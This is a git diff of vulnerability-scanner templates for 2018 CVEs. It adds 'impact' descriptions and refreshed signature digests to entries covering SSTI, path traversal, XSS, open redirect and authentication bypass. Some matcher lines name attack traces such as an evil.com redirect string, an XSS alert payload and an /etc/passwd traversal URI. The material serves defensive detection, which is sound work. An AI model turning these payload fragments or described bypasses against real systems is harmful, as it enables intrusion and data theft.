-# digest: 490a0046304402200c00ef034465dcb65667421f2b92b127bacd21b0ac636ec96124fae3a3f4e35902203e29e815c05e73f73271c1ffa3248370265dbcf089b4cb566a9e3d4739e012a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022030ea9d78b08143eb6a9b24778e5ddcb47733d608d23525ded1598060985eec5a022055ad6cf09b83fa3afd8998ae2c293c7aca0c2414a7b2cd9cd7bb4880c018220c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16341.yaml b/http/cves/2018/CVE-2018-16341.yaml
index 5e237e081a..2eb2398ca0 100644
--- a/http/cves/2018/CVE-2018-16341.yaml
+++ b/http/cves/2018/CVE-2018-16341.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Nuxeo prior to version 10.3 is susceptible to an unauthenticated remote code execution vulnerability via server-side template injection.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade Nuxeo to version 10.3 or later to mitigate this vulnerability.
   reference:
@@ -26,5 +28,4 @@ http:
         part: body
         words:
           - "31333333337"
-
-# digest: 490a00463044022059a51103f6f4ecdcf4d6c60198ce852e3a140a9ab22cf3171b45345cc35dac9c022071bb3d4196fbb3916aa58945e922a4035e8e72aa9f65794a75547ecbf3f05bd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022017a2a773e0a8c43949c4027d6437f57793abc123d2c7261c898df8c37a3837af02206bcaf8386cd8920db888038d5d0ee827d956b2cc5222be63bb1649ac54c8d3a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16668.yaml b/http/cves/2018/CVE-2018-16668.yaml
index 7e6b75e961..aa7b0f3ca9 100644
--- a/http/cves/2018/CVE-2018-16668.yaml
+++ b/http/cves/2018/CVE-2018-16668.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: CirCarLife before 4.3 is susceptible to improper authentication. An internal installation path disclosure exists due to the lack of authentication for /html/repository.System. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.
   remediation: |
     Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.
   reference:
@@ -44,4 +46,4 @@ http:
           - "** Platform sources **"
           - "** Application sources **"
         condition: and
-# digest: 4a0a00473045022100ad6fe616e3e804f193c67c2fa020485c0296f86a09b8004109c958448fa93011022009ceed8b70e5ad3989807a48af24f9054cb1011c571f723099b113814607451f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100caf372831772e7dc3291b27557963fe6e4d0972ed8776e9d63b3696166d6564f02207bce46176fcb607294c9b654458450771cd3f26f2cbfeaaafe620bc65dba1835:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16671.yaml b/http/cves/2018/CVE-2018-16671.yaml
index c5cee0cf82..b845d9201d 100644
--- a/http/cves/2018/CVE-2018-16671.yaml
+++ b/http/cves/2018/CVE-2018-16671.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: medium
   description: CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.
   remediation: |
     Upgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         regex:
           - "(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"
-# digest: 4a0a00473045022100b7b5b59bc8cc4bc989bbc5bdcab8ec34d83c2a8ddab8d2be64ab40667cad23b3022002ad8a86d17820d0d18bab87d70a7cdbab09491a7e285ece17883e3dc9d555e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200ce2d4efe87a9a002725838e84f97f18d41f8687d30ca0457a11fa3947fbcef9022100b0117104e0bfe4eff4361575be3eb05f5db60801f4b83975728dc12f2c878e94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16716.yaml b/http/cves/2018/CVE-2018-16716.yaml
index de3ac4007a..6692262be0 100644
--- a/http/cves/2018/CVE-2018-16716.yaml
+++ b/http/cves/2018/CVE-2018-16716.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: critical
   description: NCBI ToolBox 2.0.7 through 2.2.26 legacy versions contain a path traversal vulnerability via viewcgi.cgi which may result in reading of arbitrary files (i.e., significant information disclosure) or file deletion via the nph-viewgif.cgi query string.
+  impact: |
+    An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
   remediation: |
     Apply the latest patch or update from the vendor to fix the directory traversal vulnerability in the NCBI ToolBox.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205791ec953bbc3bcbe750accae8a89e5e7cb8117611effbd6091d3502872aa79402205d13b8bd62c13e6a440b8beb005865982e32b2ebbb8489c16ed919399a9c3924:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210085d8fbddbeb5957650f4e95e026b14aaccdfce34f39ba2e17aef46dbc14a504002203cea283f109ccb847450587da60f0459b2f3a1ff54c203f98b5104b725b4d136:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16761.yaml b/http/cves/2018/CVE-2018-16761.yaml
index 71c0839283..eebbf279c4 100644
--- a/http/cves/2018/CVE-2018-16761.yaml
+++ b/http/cves/2018/CVE-2018-16761.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Eventum before 3.4.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade to Eventum version 3.4.0 or later to fix the open redirect vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a00473045022100e68e354987d451e277ccac2c10468cdf6d87beea8597aa753a9e8f4751df4abc022021779a80486b81aafaf24911ab853093579be4881ad7f3b7fbe4b06b4e7b90c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022047b620e8e0ce5b9f239d17672bdbc010a2ea2503e92d99eead51281386314541022100fa376ae6dafb9770e1761305da2b8eddff166c5916b135d3c8f20e00850714ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16763.yaml b/http/cves/2018/CVE-2018-16763.yaml
index 88109be094..e7c29015ec 100644
--- a/http/cves/2018/CVE-2018-16763.yaml
+++ b/http/cves/2018/CVE-2018-16763.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: FUEL CMS 1.4.1 allows PHP Code Evaluation via the pages/select/ filter parameter or the preview/ data parameter.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system, leading to complete compromise of the application and potentially the underlying server.
   remediation: |
     Upgrade to FUEL CMS version 1.4.2 or later, which includes a patch for this vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207b6ce05bfa6b99931dd7e21c4dddd04e681570f65f89405613a333e0a3f6491b02210085d493b62357f6d8f411196c412ea5c7679875ca597d0f89a12cb604351854bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022026fd2c9dad267c5a6fbd50909f735595b1c7064aed449a41226da2a324634aa8022100f3d8e9e666410b97e2c9b29f619787c9506b2e37599d0a2fc5c66cae27311cfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16836.yaml b/http/cves/2018/CVE-2018-16836.yaml
index c030277670..479e4f0f35 100644
--- a/http/cves/2018/CVE-2018-16836.yaml
+++ b/http/cves/2018/CVE-2018-16836.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: critical
   description: Rubedo CMS through 3.4.0 contains a directory traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server.
   remediation: |
     Upgrade to a patched version of Rubedo CMS (>=3.4.1) or apply the provided security patch.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022038360eaa180dfdef9ac218b0e51cb48e5a9cee0d967f56fb06ba449131807fd5022100c6a4787d094357262990ecd70aea2ca35ad457f02a26f134d9091d277ae363b6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210099479d2bade258189160293fb9fb6399ae83fe19db85de8045640eb8b8edcac0022066e5d47db305d1c7dd4b45c32568a3f8173f588ff886ea976cc59accf58d4160:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-16979.yaml b/http/cves/2018/CVE-2018-16979.yaml
index 60f0018c15..dc302ff8a9 100644
--- a/http/cves/2018/CVE-2018-16979.yaml
+++ b/http/cves/2018/CVE-2018-16979.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Monstra CMS 3.0.4 is susceptible to HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter. An attacker can potentially supply invalid input and cause the server to allow redirects to attacker-controlled domains, perform cache poisoning, and/or allow improper access to virtual hosts not intended for this purpose. This is a related issue to CVE-2012-2943.
+  impact: |
+    This vulnerability can lead to various attacks such as session hijacking, cross-site scripting (XSS), and remote code execution (RCE).
   remediation: |
     Upgrade Monstra CMS to version 3.0.5 or later to mitigate the HTTP Header Injection vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e83dd7b3545ce41cf7087d4e8eed0d83e5ddab49c26c8d8db558b4f6e5110266022063fd8abf645291922139f4844ce91827cf35a875d7659dbaefb470fb76dc0dcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204fb12023533296276ddddb7f4c0dca7e6c90a512bd1603ddac51a9f214397438022100de788991d48ce8d2df6ec03bbf2c6074c55a7efcc4ef73bb412ad4facc6d14aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17153.yaml b/http/cves/2018/CVE-2018-17153.yaml
index 59a662126d..7cc7c7ea3b 100644
--- a/http/cves/2018/CVE-2018-17153.yaml
+++ b/http/cves/2018/CVE-2018-17153.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     It was discovered that the Western Digital My Cloud device before 2.30.196 is affected by an authentication bypass vulnerability. An unauthenticated attacker can exploit this vulnerability to authenticate as an admin user without needing to provide a password, thereby gaining full control of the device. (Whenever an admin logs into My Cloud, a server-side session is created that is bound to the user's IP address. After the session is created, it is possible to call authenticated CGI modules by sending the cookie username=admin in the HTTP request. The invoked CGI will check if a valid session is present and bound to the user's IP address.) It was found that it is possible for an unauthenticated attacker to create a valid session without a login. The network_mgr.cgi CGI module contains a command called \"cgi_get_ipv6\" that starts an admin session -- tied to the IP address of the user making the request -- if the additional parameter \"flag\" with the value \"1\" is provided. Subsequent invocation of commands that would normally require admin privileges now succeed if an attacker sets the username=admin cookie.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to data theft or unauthorized control of the NAS.
   remediation: |
     Apply the latest firmware update provided by Western Digital to fix the authentication bypass vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
           - contains(body, "ganalytics")
           - status_code == 200
         condition: and
-# digest: 4a0a0047304502202da97720846ca9e84a28ac1344cfcca4ed1190971d23f84bc508df03d974cc59022100b6ee2479d225da541a95a17b1de9849e143244f91190c0bed9fb5ae41df07e65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d20f9bd82d848fd52f8021d862a8aab244b2fa2bbc9dabf59d02ad9ea2fb7ac002207e6d055f2b948e93a99ae4a6b6bdb9ccf54547a21ca1fdd838064f4c54cfc699:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17246.yaml b/http/cves/2018/CVE-2018-17246.yaml
index e0f90055bb..4c28afa9af 100644
--- a/http/cves/2018/CVE-2018-17246.yaml
+++ b/http/cves/2018/CVE-2018-17246.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha,thelicato
   severity: critical
   description: Kibana versions before 6.4.3 and 5.6.13 contain an arbitrary file inclusion flaw in the Console plugin. An attacker with access to the Kibana Console API could send a request that will attempt to execute JavaScript which could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server, leading to potential information disclosure and further attacks.
   remediation: |
     Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
         part: header
         words:
           - "application/json"
-# digest: 4b0a00483046022100fc1fb57b927865cf23d832405636f3b9bed49385ae346919d733bed1f38c3370022100f0fc6ed7b9f4e47d122379484cb90a0415ef3bec1a724b22521c7a254b724131:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e19dd0c69dd68b88c52971dc65ba9b1552afe873c6552db27c5c84daa1cb5262022100da464e134545f68cf2550c6dfd32c9fd88dce6a8e132622db659a41af2ea16ac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17254.yaml b/http/cves/2018/CVE-2018-17254.yaml
index 5a6e0bd12a..e33c66d185 100644
--- a/http/cves/2018/CVE-2018-17254.yaml
+++ b/http/cves/2018/CVE-2018-17254.yaml
@@ -5,6 +5,8 @@ info:
   author: Suman_Kar
   severity: critical
   description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.
   remediation: Update or remove the affected plugin.
   reference:
     - http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
@@ -38,4 +40,4 @@ http:
         part: body
         words:
           - '{{md5(num)}}'
-# digest: 4a0a00473045022100f46dec1bb0bd4dfe210a2f29b13a1a075b01bb385d01118874d9aaf6adab040c0220498b24f54dfd34575da35c00b489cad51cd6aa646b4a3ee10e4efe2f08dc3ee9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d281a66380f218c040583ca45da5631e52ca10dae41652236336600c29e07430022071ccc73e71124a5d104f3732269ed3a1fa1415d0c388c22a28460b188c398bd7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17422.yaml b/http/cves/2018/CVE-2018-17422.yaml
index e9df96e631..98a34aba79 100644
--- a/http/cves/2018/CVE-2018-17422.yaml
+++ b/http/cves/2018/CVE-2018-17422.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         words:
           - "self.location = 'http://evil.com'"
           - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'"
-# digest: 490a004630440220764e714391324e71519aaa1566713979cb48a419e59b64d3b4201a6237a2fc4302207adf0922d92981fdcad0d44ed3e97b43e55b3c966bbc2fe7fc4246f8dde8a626:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207fff7a89a291c247ce3e33712e522aaf653c4789d54404d0ab3e15212a5abdb402202536232c184bf37c893b6f45d63519126783206d7e46d26f85e1a8f8322ea575:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-17431.yaml b/http/cves/2018/CVE-2018-17431.yaml
index 11e76aaf60..567fa239f7 100644
--- a/http/cves/2018/CVE-2018-17431.yaml
+++ b/http/cves/2018/CVE-2018-17431.yaml
@@ -5,6 +5,8 @@ info:
   author: dwisiswant0
   severity: critical
   description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 are susceptible to a web shell based remote code execution vulnerability.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Apply the latest security patches or updates provided by Comodo to fix this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502210082001249f68dfb2fbd0709410682f398e554138bd7c47eaac9146b70fd9b9b4a02203c4caf4d9e6dd1fc5d4b0064d56b09a8b61deea85e0561a1212b6d65a6c02251:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c61cb461fed0c28ef7b72aaba2cc8b6f340dc281adb0c21cecbd9b08d14f297d02201bd55f622da9fb615643bebcaa087b28cc73287e0592c2ff8b76473f8e6e114a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18069.yaml b/http/cves/2018/CVE-2018-18069.yaml
index 1790772bb5..010c50e864 100644
--- a/http/cves/2018/CVE-2018-18069.yaml
+++ b/http/cves/2018/CVE-2018-18069.yaml
@@ -5,6 +5,8 @@ info:
   author: nadino
   severity: medium
   description: WordPress plugin sitepress-multilingual-cms 3.6.3 is vulnerable to cross-site scripting in process_forms via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
   remediation: |
     Update WordPress sitepress-multilingual-cms to the latest version to mitigate the XSS vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - 'contains(set_cookie, "_icl_current_admin_language")'
           - 'contains(body, "\"><script>alert(0);</script>")'
         condition: and
-# digest: 490a004630440220751db0953aee0c0b063ad1a27c18ff3cb7a7804525600ccc8c9185de8536768502200711cfae316e48931a4e7f0fc3bdcc6a769a13baf88e070d9e99fa8210fb445c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022025096c0add9eded7737dac192f3967cdd798afe2bea6264336b9416338ca7537022100e17fc6a1cfa18c1d89c565d599d67a015f6c16cd65232e1022bc682a94aa76a9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18264.yaml b/http/cves/2018/CVE-2018-18264.yaml
index 81c8fb17c3..9b56e4b421 100644
--- a/http/cves/2018/CVE-2018-18264.yaml
+++ b/http/cves/2018/CVE-2018-18264.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the Kubernetes Dashboard, potentially leading to further compromise of the Kubernetes cluster.
   remediation: |
     Upgrade to Kubernetes Dashboard version 1.10.1 or later to mitigate the authentication bypass vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b24742f63a05b3f5b6bdc1d2d21476de48f066464ca01da7b1be4543fbc4dd2f022100cc9366d107751747cd7ffebd6629c170603b1287dba02c55e227d968992ae717:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022008ca3c376b75bd33f0781f8f393afd285ae62302db8637a426727ee93fd7135e022100e3f92d05fe1c30436b29225aeda8463158fa9b01db4f9649f1791ee0f917f517:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18323.yaml b/http/cves/2018/CVE-2018-18323.yaml
index 93fc09a449..c2c16ddf3f 100644
--- a/http/cves/2018/CVE-2018-18323.yaml
+++ b/http/cves/2018/CVE-2018-18323.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Centos Web Panel version 0.9.8.480 suffers from local file inclusion vulnerabilities. Other vulnerabilities including cross-site scripting and remote code execution are also known to impact this version.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read sensitive files on the server.
   remediation: |
     Upgrade to a patched version of Centos Web Panel.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210094e1e91c112925f02574355a647acaa935bdf59e8b47c1e81a3daae79422ecb5022100878ef436f6a39ba4681024e8a509e97297686d3963b21830bd01278a1a75b62e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e68d62f7ad1346d100c40736e9b5f836af425f2907ede7b06213c9f8638b606d022100e434c324535cac337bcedad0838fe445311a0dc98a211a8b2cd644145dffe07e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18570.yaml b/http/cves/2018/CVE-2018-18570.yaml
index ef0280cd30..203743f286 100644
--- a/http/cves/2018/CVE-2018-18570.yaml
+++ b/http/cves/2018/CVE-2018-18570.yaml
@@ -5,6 +5,8 @@ info:
   author: emadshanab
   severity: medium
   description: Planon before Live Build 41 is vulnerable to cross-site scripting.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of Planon Live Build.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201615f098a9736da7233e87a52f0b667704189f2dc0493d73912c81a4273ad4c7022100aa1854ae9596595bdcaeac92dd2fb1b5fdefed6b6a11e06f550fd60a0d7d7905:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220521f81939e04c8b11e7399207b5ff5241471783cac11ccbef6ec58b8bfa303df022100dd39e8d49b1067ee52556b028ba715132fe4ca43582b4964267ec4d526989621:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml
index 798265ea62..19b5646518 100644
--- a/http/cves/2018/CVE-2018-18608.yaml
+++ b/http/cves/2018/CVE-2018-18608.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DedeCMS 5.7 SP2 is vulnerable to cross-site scripting via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DedeCMS or apply the official patch provided by the vendor to fix the XSS vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207de6b92f9c88d9f8ab31ef04426d5f72e7af7f7cd0cfbc95e600fdd829dff7e5022100a2a0ea844c51ead4cbc7e803687aee449c54692cccf9eed22ad48744eaf5bfe6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008ed2619cee872ea0b25fdec8aef5bf8388725b6cbf22e828af2b10dbcd82aa490221008fe627c8e0b749ea1962a991ac79480fb8032491a34d19359a2a5bff957743a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18775.yaml b/http/cves/2018/CVE-2018-18775.yaml
index 314a86fa43..278adf6bec 100644
--- a/http/cves/2018/CVE-2018-18775.yaml
+++ b/http/cves/2018/CVE-2018-18775.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by Microstrategy to fix the XSS vulnerability in the Web 7 application.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c4c435cd00762eb2c9eccaf5de1c36ff3ecd25b4f3513f0244c0f8106cd5dc5d022100c4ebf543b3ae0a6360044a36c739abc8e88a24456d2d9dd38b7dcbdb2084556c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220266494839f4320d0266f61f16a5360640dcce7548bf95fe21794672fa19184ed02204c3cba0704d8c636c1a230a51b042bf23dec8310ea3a55596111ea75d50765c3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml
index d351f6f220..a0dfdee854 100644
--- a/http/cves/2018/CVE-2018-18777.yaml
+++ b/http/cves/2018/CVE-2018-18777.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Microstrategy Web.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009b423c63a3d2e04546b8dea5f2114289c3d4f18297c3df4b89eb022bba358114022100cc159f9e3e825224ece53277ac74c2323a4a7f49d8469bfc05548e9bf33f9bde:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200d6d2ff87dba44b58403ea1645699256e37ab6181b0d2d009e3dff3618cdda8e02202259737bf64ca51ad14e96d0fc9cb8fdc8da62247c979d07c2a1cae0b231d0d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml
index a0e75d27f0..819d12900a 100644
--- a/http/cves/2018/CVE-2018-18778.yaml
+++ b/http/cves/2018/CVE-2018-18778.yaml
@@ -5,6 +5,8 @@ info:
   author: DhiyaneshDK,dogasantos
   severity: medium
   description: ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server.
   remediation: |
     Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e6b7b548bde569b368312f5ac758f650aaec65f0da9daf841b5c3f559002c0c402210082add919636ce9ced41d96542d3b51387d54583c3c4e7cd2176c6740576e5786:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038468c968d47ad446ab1cfd510be13223851e833702af08f2fa19e3b2d55cdf302204986bdaf5d56697ea6883a2cbe86d964f6f99ef709a39b20e0150649ba870f27:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml
index 63809dc76c..9ba7ae7486 100644
--- a/http/cves/2018/CVE-2018-18809.yaml
+++ b/http/cves/2018/CVE-2018-18809.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.
+  impact: |
+    An attacker can access sensitive files, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Apply the latest security patches or upgrade to a patched version of TIBCO JasperReports Library.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207c08214931c6bd01893a31cd4dc36742c506df02c05e81633ff8e11b0740b71002200561fb80835f3ee23a7a0989e294606688360d6832196e0bf914ce045a04cb4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
